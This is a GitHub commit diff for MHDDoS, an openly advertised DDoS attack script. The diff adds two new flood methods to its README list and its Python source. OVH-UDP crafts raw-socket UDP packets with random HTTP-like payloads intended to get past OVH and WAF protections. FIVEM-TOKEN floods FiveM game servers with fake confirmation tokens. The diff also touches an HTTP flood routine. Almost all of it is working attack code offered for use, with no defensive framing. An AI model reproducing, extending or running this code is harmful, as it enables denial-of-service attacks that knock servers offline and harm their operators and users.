New Attack Methods Added — FIVEM-TOKEN, OVH-UDP

New Attack Methods Added — FIVEM-TOKEN, OVH-UDP
This commit is contained in:
_MRZT721010_ 2025-10-22 23:39:24 +03:30 committed by GitHub
commit fa57712c70
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 74 additions and 10 deletions

View File

@ -1,4 +1,4 @@
<h1 align="center">MHDDoS - DDoS Attack Script With 56 Methods</h1>
<h1 align="center">MHDDoS - DDoS Attack Script With 57 Methods</h1>
<em><h5 align="center">(Programming Language - Python 3)</h5></em>
<p align="center">
@ -49,12 +49,14 @@
* <img src="https://raw.githubusercontent.com/kgretzky/pwndrop/master/media/pwndrop-logo-512.png" width="16" height="16" alt="tcp"> TCP | TCP Flood Bypass
* <img src="https://styles.redditmedia.com/t5_2rxmiq/styles/profileIcon_snoob94cdb09-c26c-4c24-bd0c-66238623cc22-headshot.png" width="16" height="16" alt="udp"> UDP | UDP Flood Bypass
* <img src="https://cdn-icons-png.flaticon.com/512/1918/1918576.png" width="16" height="16" alt="syn"> SYN | SYN Flood
* <img src="https://static-00.iconduck.com/assets.00/ovh-icon-2048x2048-l4c3izvg.png" width="16" height="16" alt="ovh"> OVH-UDP | UDP flood with random HTTP headers and binary payload to bypass OVH and WAFs.
* <img src="https://cdn-icons-png.flaticon.com/512/1017/1017466.png" width="16" height="16" alt="cps"> CPS | Open and close connections with proxy
* <img src="https://icon-library.com/images/icon-ping/icon-ping-28.jpg" width="16" height="16" alt="icmp"> ICMP | Icmp echo request flood (Layer3)
* <img src="https://s6.uupload.ir/files/1059643_g8hp.png" width="16" height="16" alt="connection"> CONNECTION | Open connection alive with proxy
* <img src="https://ia803109.us.archive.org/27/items/source-engine-video-projects/source-engine-video-projects_itemimage.png" width="16" height="16" alt="vse"> VSE | Send Valve Source Engine Protocol
* <img src="https://mycrackfree.com/wp-content/uploads/2018/08/TeamSpeak-Server-9.png" width="16" height="16" alt="teamspeak 3"> TS3 | Send Teamspeak 3 Status Ping Protocol
* <img src="https://cdn2.downdetector.com/static/uploads/logo/75ef9fcabc1abea8fce0ebd0236a4132710fcb2e.png" width="16" height="16" alt="fivem"> FIVEM | Send FiveM Status Ping Protocol
* <img src="https://github.com/user-attachments/assets/f40748bf-dd28-4294-b862-cb0acbc74eea" width="16" height="16" alt="fivem-token"> FIVEM-TOKEN | Send FiveM confirmation token flood
* <img src="https://cdn.iconscout.com/icon/free/png-512/redis-4-1175103.png" width="16" height="16" alt="mem"> MEM | Memcached Amplification
* <img src="https://lyrahosting.com/wp-content/uploads/2020/06/ddos-attack-icon.png" width="16" height="16" alt="ntp"> NTP | NTP Amplification
* <img src="https://cdn-icons-png.flaticon.com/512/4712/4712139.png" width="16" height="16" alt="mcbot"> MCBOT | Minecraft Bot Attack

View File

@ -10,7 +10,7 @@ from multiprocessing import RawValue
from os import urandom as randbytes
from pathlib import Path
from re import compile
from random import choice as randchoice
from random import choice as randchoice, randint
from socket import (AF_INET, IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, IPPROTO_UDP, SOCK_DGRAM, IPPROTO_ICMP,
SOCK_RAW, SOCK_STREAM, TCP_NODELAY, gethostbyname,
gethostname, socket)
@ -136,8 +136,8 @@ class Methods:
LAYER4_METHODS: Set[str] = {*LAYER4_AMP,
"TCP", "UDP", "SYN", "VSE", "MINECRAFT",
"MCBOT", "CONNECTION", "CPS", "FIVEM",
"TS3", "MCPE", "ICMP"
"MCBOT", "CONNECTION", "CPS", "FIVEM", "FIVEM-TOKEN",
"TS3", "MCPE", "ICMP", "OVH-UDP",
}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
@ -469,6 +469,8 @@ class Layer4(Thread):
"TS3": self.TS3,
"MCPE": self.MCPE,
"FIVEM": self.FIVEM,
"FIVEM-TOKEN": self.FIVEMTOKEN,
"OVH-UDP": self.OVHUDP,
"MINECRAFT": self.MINECRAFT,
"CPS": self.CPS,
"CONNECTION": self.CONNECTION,
@ -539,6 +541,14 @@ class Layer4(Thread):
continue
Tools.safe_close(s)
def OVHUDP(self) -> None:
with socket(AF_INET, SOCK_RAW, IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while True:
for payload in self._generate_ovhudp():
Tools.sendto(s, payload, self._target)
Tools.safe_close(s)
def ICMP(self) -> None:
payload = self._genrate_icmp()
s = None
@ -558,8 +568,7 @@ class Layer4(Thread):
def AMP(self) -> None:
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW,
IPPROTO_UDP) as s:
with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, *next(self._amp_payloads)):
continue
@ -597,6 +606,24 @@ class Layer4(Thread):
continue
Tools.safe_close(s)
def FIVEMTOKEN(self) -> None:
global BYTES_SEND, REQUESTS_SENT
# Generete token and guid
token = str(uuid4())
steamid_min = 76561197960265728
steamid_max = 76561199999999999
guid = str(randint(steamid_min, steamid_max))
# Build Payload
payload_str = f"token={token}&guid={guid}"
payload = payload_str.encode('utf-8')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def FIVEM(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\xff\xff\xff\xffgetinfo xxx\x00\x00\x00'
@ -624,6 +651,41 @@ class Layer4(Thread):
continue
Tools.safe_close(s)
def _generate_ovhudp(self) -> List[bytes]:
packets = []
methods = ["PGET", "POST", "HEAD", "OPTIONS", "PURGE"]
paths = ['/0/0/0/0/0/0', '/0/0/0/0/0/0/', '\\0\\0\\0\\0\\0\\0', '\\0\\0\\0\\0\\0\\0\\', '/', '/null', '/%00%00%00%00']
for _ in range(randint(2, 4)):
ip = IP()
ip.set_ip_src(__ip__)
ip.set_ip_dst(self._target[0])
udp = UDP()
udp.set_uh_sport(randint(1024, 65535))
udp.set_uh_dport(self._target[1])
payload_size = randint(1024, 2048)
random_part = randbytes(payload_size).decode("latin1", "ignore")
method = randchoice(methods)
path = randchoice(paths)
payload_str = (
f"{method} {path}{random_part} HTTP/1.1\n"
f"Host: {self._target[0]}:{self._target[1]}\r\n\r\n"
)
payload = payload_str.encode("latin1", "ignore")
udp.contains(Data(payload))
ip.contains(udp)
packets.append(ip.get_packet())
return packets
def _genrate_syn(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(__ip__)
@ -1160,7 +1222,10 @@ class HttpFlood(Thread):
Tools.safe_close(s)
def GSB(self):
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
self._target.raw_path_qs,
ProxyTools.Random.rand_str(6)) +
"Host: %s\r\n" % self._target.authority +
@ -1176,9 +1241,6 @@ class HttpFlood(Thread):
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n\r\n')
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)